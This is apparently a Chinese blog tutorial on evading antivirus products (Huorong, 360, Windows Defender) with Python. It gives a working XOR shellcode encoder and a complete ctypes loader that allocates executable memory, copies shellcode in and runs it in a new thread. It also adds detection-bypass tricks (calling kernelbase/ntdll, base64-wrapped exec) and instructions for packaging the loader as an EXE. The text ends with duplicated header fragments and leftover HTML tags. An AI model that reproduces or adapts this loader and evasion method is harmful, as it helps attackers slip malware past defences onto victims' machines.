Python免杀技术：绕过杀软的内存检测<\/h1>

前言<\/h2>
本文介绍了一种利用Python编写免杀脚本的技术，主要针对火绒、360和Windows Defender等杀毒软件。核心思路是通过Python的ctypes模块调用Windows API，结合简单的混淆技术来隐藏shellcode特征。<\/p>

技术原理<\/h2>

免杀基本思路<\/h3>

特征码隐藏<\/strong>：杀毒软件主要依靠特征码检测恶意代码，通过混淆和加密隐藏原始特征<\/li>
绕过内存写入监控<\/strong>：C语言中的内存操作函数(memcpy, memmove等)被严格监控，使用Python实现可绕过部分检测<\/li>

动态链接库调用<\/strong>：通过不同DLL中的相同功能函数绕过特定API的检测<\/li> <\/ol>
实现步骤<\/h2>
1. Shellcode混淆处理<\/h3>
使用简单的异或算法对原始shellcode进行混淆：<\/p>
import<\/span> argparse <\/span><\/span> <\/span><\/span>def<\/span> xorEncode<\/span>(file, key, output): <\/span><\/span> xorShellcode =<\/span> ""<\/span> <\/span><\/span> shellcodeSize =<\/span> 0<\/span> <\/span><\/span> while<\/span> True<\/span>: <\/span><\/span> code =<\/span> file.<\/span>read(1<\/span>) <\/span><\/span> if<\/span> not<\/span> code: <\/span><\/span> break<\/span> <\/span><\/span> xor =<\/span> ord(code) ^<\/span> key <\/span><\/span> xor_code =<\/span> hex(xor).<\/span>replace("0x"<\/span>, ""<\/span>) <\/span><\/span> if<\/span> len(xor_code) ==<\/span> 1<\/span>: <\/span><\/span> xor_code =<\/span> f<\/span>'0<\/span>{<\/span>xor_code}<\/span>'<\/span> <\/span><\/span> xorShellcode +=<\/span> f<\/span>'<\/span>\\<\/span>x<\/span>{<\/span>xor_code}<\/span>'<\/span> <\/span><\/span> shellcodeSize +=<\/span> 1<\/span> <\/span><\/span> file.<\/span>close() <\/span><\/span> output.<\/span>write(xorShellcode) <\/span><\/span> output.<\/span>close() <\/span><\/span> print(f<\/span>"shellcodeSize: <\/span>{<\/span>shellcodeSize}<\/span>"<\/span>) <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>: <\/span><\/span> parser =<\/span> argparse.<\/span>ArgumentParser(description=<\/span>"Python XOR Encoder"<\/span>) <\/span><\/span> parser.<\/span>add_argument('-f'<\/span>, '--file'<\/span>, help=<\/span>"input raw file"<\/span>, type=<\/span>argparse.<\/span>FileType('rb'<\/span>)) <\/span><\/span> parser.<\/span>add_argument('-k'<\/span>, '--key'<\/span>, help=<\/span>"xor key"<\/span>, type=<\/span>int, default=<\/span>50<\/span>) <\/span><\/span> parser.<\/span>add_argument('-o'<\/span>, '--output'<\/span>, help=<\/span>"output shellcode file"<\/span>, type=<\/span>argparse.<\/span>FileType('w+'<\/span>)) <\/span><\/span> args =<\/span> parser.<\/span>parse_args() <\/span><\/span> xorEncode(args.<\/span>file, args.<\/span>key, args.<\/span>output) <\/span><\/span><\/code><\/pre>2. 关键Windows API函数<\/h3> 使用ctypes调用的关键API函数：<\/p> VirtualAlloc<\/strong> - 申请可执行内存<\/p> LPVOID VirtualAlloc<\/span>( <\/span><\/span> LPVOID lpAddress, \/\/ 指定要分配的区域的期望起始地址 <\/span><\/span><\/span><\/span> SIZE_T dwSize, \/\/ 要分配的堆栈大小 <\/span><\/span><\/span><\/span> DWORD flAllocationType, \/\/ 类型的分配 <\/span><\/span><\/span><\/span> DWORD flProtect \/\/ 内存的执行权限 <\/span><\/span><\/span><\/span>); <\/span><\/span><\/code><\/pre> flAllocationType参数： MEM_COMMIT<\/code> (0x00001000): 提交到物理内存<\/li> MEM_REVERSE<\/code>: 保留虚拟内存<\/li> <\/ul> <\/li> flProtect参数： PAGE_EXECUTE_READWRITE<\/code> (0x40): 可读可写可执行<\/li> PAGE_READWRITE<\/code>: 可读可写<\/li> <\/ul> <\/li> <\/ul> <\/li> RtlMoveMemory<\/strong> - 内存复制<\/p> VOID RtlMoveMemory<\/span>( <\/span><\/span> VOID UNALIGNED *<\/span>Destination, \/\/ 目标地址 <\/span><\/span><\/span><\/span> CONST VOID UNALIGNED *<\/span>Source, \/\/ 源内存块 <\/span><\/span><\/span><\/span> SIZE_T Length \/\/ 内存块大小 <\/span><\/span><\/span><\/span>); <\/span><\/span><\/code><\/pre><\/li> CreateThread<\/strong> - 创建线程执行shellcode<\/p> HANDLE CreateThread<\/span>( <\/span><\/span> LPSECURITY_ATTRIBUTES lpThreadAttributes, \/\/ 安全属性 <\/span><\/span><\/span><\/span> SIZE_T dwStackSize, \/\/ 初始栈大小 <\/span><\/span><\/span><\/span> LPTHREAD_START_ROUTINE lpStartAddress, \/\/ 线程函数地址 <\/span><\/span><\/span><\/span> LPVOID lpParameter, \/\/ 线程参数 <\/span><\/span><\/span><\/span> DWORD dwCreationFlags, \/\/ 创建线程标志 <\/span><\/span><\/span><\/span> LPDWORD lpThreadId \/\/ 线程ID <\/span><\/span><\/span><\/span>); <\/span><\/span><\/code><\/pre><\/li> WaitForSingleObject<\/strong> - 等待线程执行<\/p> DWORD WaitForSingleObject<\/span>( <\/span><\/span> HANDLE hHandle, \/\/ 句柄 <\/span><\/span><\/span><\/span> DWORD dwMilliseconds \/\/<\/span> 等待标志<\/span>(INFINITE表示无限等待<\/span>) <\/span><\/span>); <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3. 基础免杀实现<\/h3> import<\/span> ctypes <\/span><\/span> <\/span><\/span># xor shellcode<\/span> <\/span><\/span>XorBuf =<\/span> "混淆后的shellcode"<\/span> <\/span><\/span>key =<\/span> 35<\/span> # 异或密钥<\/span> <\/span><\/span> <\/span><\/span># 还原shellcode<\/span> <\/span><\/span>buf =<\/span> bytearray([ord(XorBuf[i]) ^<\/span> key for<\/span> i in<\/span> range(len(XorBuf))]) <\/span><\/span> <\/span><\/span># 获取kernel32<\/span> <\/span><\/span>kernel32 =<\/span> ctypes.<\/span>windll.<\/span>kernel32 <\/span><\/span>kernel32.<\/span>VirtualAlloc.<\/span>restype =<\/span> ctypes.<\/span>c_uint64 <\/span><\/span> <\/span><\/span># 申请可执行内存<\/span> <\/span><\/span>lpMemory =<\/span> kernel32.<\/span>VirtualAlloc( <\/span><\/span> ctypes.<\/span>c_int(0<\/span>), <\/span><\/span> ctypes.<\/span>c_int(len(buf)), <\/span><\/span> ctypes.<\/span>c_int(0x00001000<\/span>), <\/span><\/span> ctypes.<\/span>c_int(0x40<\/span>) <\/span><\/span>) <\/span><\/span> <\/span><\/span># 写入shellcode<\/span> <\/span><\/span>buffer =<\/span> (ctypes.<\/span>c_char *<\/span> len(buf)).<\/span>from_buffer(buf) <\/span><\/span>kernel32.<\/span>RtlMoveMemory( <\/span><\/span> ctypes.<\/span>c_uint64(lpMemory), <\/span><\/span> buffer, <\/span><\/span> ctypes.<\/span>c_int(len(buf)) <\/span><\/span>) <\/span><\/span> <\/span><\/span># 创建线程执行<\/span> <\/span><\/span>hThread =<\/span> kernel32.<\/span>CreateThread( <\/span><\/span> ctypes.<\/span>c_int(0<\/span>), <\/span><\/span> ctypes.<\/span>c_int(0<\/span>), <\/span><\/span> ctypes.<\/span>c_uint64(lpMemory), <\/span><\/span> ctypes.<\/span>c_int(0<\/span>), <\/span><\/span> ctypes.<\/span>c_int(0<\/span>), <\/span><\/span> ctypes.<\/span>pointer(ctypes.<\/span>c_int(0<\/span>)) <\/span><\/span>) <\/span><\/span> <\/span><\/span># 等待线程执行<\/span> <\/span><\/span>kernel32.<\/span>WaitForSingleObject(hThread, -<\/span>1<\/span>) <\/span><\/span><\/code><\/pre>4. 绕过CreateThread检测<\/h3> 杀毒软件可能检测kernel32.dll中的CreateThread调用，可以尝试：<\/p> 使用不同DLL中的相同功能函数<\/strong>：<\/p> # 使用kernelbase.dll中的CreateThread<\/span> <\/span><\/span>kernelbase =<\/span> ctypes.<\/span>windll.<\/span>kernelbase <\/span><\/span>hThread =<\/span> kernelbase.<\/span>CreateThread(...<\/span>) <\/span><\/span><\/code><\/pre><\/li> 使用ntdll.dll中的ZwCreateThread<\/strong>：<\/p> ntdll =<\/span> ctypes.<\/span>windll.<\/span>ntdll <\/span><\/span>hThread =<\/span> ntdll.<\/span>ZwCreateThread(...<\/span>) <\/span><\/span><\/code><\/pre><\/li> 动态执行base64编码的代码<\/strong>：<\/p> import<\/span> base64 <\/span><\/span> <\/span><\/span># 加密关键代码<\/span> <\/span><\/span>exec(base64.<\/span>b64decode(b<\/span>"aFRocmVhZCA9IGtlcm5lbGJhc2UuQ3JlYXRlVGhyZWFkKAogICAgY3R5cGVzLmNfaW50KDApLAogICAgY3R5cGVzLmNfaW50KDApLAogICAgY3R5cGVzLmNfdWludDY0KGxwTWVtb3J5KSwKICAgIGN0eXBlcy5jX2ludCgwKSwKICAgIGN0eXBlcy5jX2ludCgwKSwKICAgIGN0eXBlcy5wb2ludGVyKGN0eXBlcy5jX2ludCgwKSkKKQ=="<\/span>).<\/span>decode()) <\/span><\/span><\/code><\/pre><\/li> <\/ol> 编译为可执行文件<\/h2> 推荐使用auto-py-to-exe<\/code>工具将Python脚本编译为EXE文件：<\/p> 安装auto-py-to-exe：<\/p> pip install auto-py-to-exe <\/code><\/pre> <\/li> 运行并配置：<\/p> auto-py-to-exe <\/code><\/pre> <\/li> 选择脚本文件，配置选项后编译<\/p> <\/li> <\/ol> 注意事项<\/h2> 特征码检测<\/strong>：不同杀毒软件检测点不同，可能需要尝试多种绕过方式<\/li> DLL函数选择<\/strong>：不同DLL中的相同功能函数可能有不同的检测规则<\/li> 代码混淆<\/strong>：关键代码可以进一步混淆或加密<\/li> 沙箱检测<\/strong>：部分高级沙箱可能会检测动态行为<\/li> <\/ol> 总结<\/h2> 这种免杀方法主要利用了：<\/p> Python实现绕过对C语言内存操作的监控<\/li> 简单的异或混淆隐藏shellcode特征<\/li> 动态链接库函数的选择性调用绕过API检测<\/li> 动态代码执行绕过静态分析<\/li> <\/ol> 通过组合这些技术，可以有效绕过部分杀毒软件的检测机制。<\/p>

Python免杀技术：绕过杀软的内存检测<\/h1>

前言<\/h2> 本文介绍了一种利用Python编写免杀脚本的技术，主要针对火绒、360和Windows Defender等杀毒软件。核心思路是通过Python的ctypes模块调用Windows API，结合简单的混淆技术来隐藏shellcode特征。<\/p>

技术原理<\/h2>

实现步骤<\/h2>

前言<\/h2>
本文介绍了一种利用Python编写免杀脚本的技术，主要针对火绒、360和Windows Defender等杀毒软件。核心思路是通过Python的ctypes模块调用Windows API，结合简单的混淆技术来隐藏shellcode特征。<\/p>